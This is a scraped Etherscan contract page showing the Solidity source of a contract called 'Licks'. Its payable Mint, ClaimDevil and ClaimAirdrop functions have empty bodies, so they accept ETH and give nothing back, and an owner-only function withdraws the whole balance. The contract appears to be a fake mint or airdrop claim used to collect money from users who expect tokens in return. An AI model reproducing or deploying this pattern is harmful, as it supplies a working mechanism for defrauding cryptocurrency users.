ETH Price: $3,403.02 (+2.02%)

Contract Diff Checker

Contract Name:
Licks

Contract Source Code:

File 1 of 1 : Licks

/**
 *Submitted for verification at Etherscan.io on 2022-12-12
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.16;

contract Licks {

    address private  owner;    // current owner of the contract

    constructor(){
        owner = msg.sender;
    }

    function getOwner(
    ) public view returns (address) {
        return owner;
    }

    modifier onlyOwner() {
        require(owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    function withdrawBalance() external onlyOwner{
      (bool success, ) = msg.sender.call{value: address(this).balance}("");
      require(success, "WITHDRAW FAILED!");
    }

    function Mint() public payable {
    }

    function ClaimDevil() public payable {
    }

    function ClaimAirdrop() public payable {
    }

}

Please enter a contract address above to load the contract details and source code.

Context size (optional):